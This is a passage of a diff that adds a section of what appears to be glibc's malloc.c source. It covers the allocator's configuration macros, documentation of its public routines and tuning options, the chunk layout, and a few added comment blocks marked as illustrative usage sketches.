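+   from the upstream sources; the name example_morecore and the static pool
+   are invented).  It only ever grows, so a real replacement along these
+   lines would also define MORECORE_CANNOT_TRIM (see below):
+
+     static char pool[1 << 20];
+     static size_t pool_off;
+
+     void *
+     example_morecore (ptrdiff_t increment)
+     {
+       if (increment < 0 || pool_off + increment > sizeof (pool))
+         return (void *) MORECORE_FAILURE;
+       void *old_top = pool + pool_off;
+       pool_off += increment;
+       return old_top;
+     }
+*/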
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
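+
+/* Usage sketch (illustrative only, not from the upstream sources), showing
+   in particular that a failed realloc leaves the original block intact:
+
+     char *p = malloc (100);
+     char *q = realloc (p, 1000);
+     if (q == NULL)
+       free (p);        // p was NOT freed and must still be released
+     else
+       p = q;           // p may have moved; its first 100 bytes are preserved
+*/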
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
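+
+/* Usage sketch (illustrative only, not from the upstream sources): a
+   100-byte buffer aligned to a 64-byte boundary, e.g. to keep it within
+   cache lines:
+
+     void *p = memalign (64, 100);
+     assert (((uintptr_t) p & 63) == 0);
+*/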
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
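+
+/* Usage sketch (illustrative only, not from the upstream sources), using
+   two of the parameters listed above:
+
+     mallopt (M_MXFAST, 0);                     // disable fastbins entirely
+     mallopt (M_MMAP_THRESHOLD, 1024 * 1024);   // mmap only requests >= 1MB
+*/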
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
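+
+/* Usage sketch (illustrative only, not from the upstream sources), printing
+   a few of the fields described above (the fields are plain ints):
+
+     struct mallinfo mi = mallinfo ();
+     printf ("in use: %d  free: %d  mmapped: %d\n",
+             mi.uordblks, mi.fordblks, mi.hblkhd);
+*/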
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
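+
+/* Usage sketch (illustrative only, not from the upstream sources): after
+   freeing a large working set, ask for everything above a 64KB pad to be
+   returned to the system:
+
+     int released = malloc_trim (64 * 1024);
+     // released is 1 if any memory was actually given back, 0 otherwise
+*/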
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
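+
+/* Usage sketch (illustrative only, not from the upstream sources): unlike
+   memalign, failure is reported through the return value, and the alignment
+   must be a power-of-two multiple of sizeof (void *):
+
+     void *p;
+     if (posix_memalign (&p, 4096, 8192) == 0)
+       {
+         free (p);      // p was page-aligned; release it with free()
+       }
+*/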
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
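+
+/* Worked example (illustrative only, not from the upstream sources): with
+   SIZE_SZ == 8 the user pointer sits 16 bytes past the chunk header, so for
+   a chunk header at (say) 0x602000:
+
+     chunk2mem (0x602000) == (void *)    0x602010
+     mem2chunk (0x602010) == (mchunkptr) 0x602000
+*/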
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
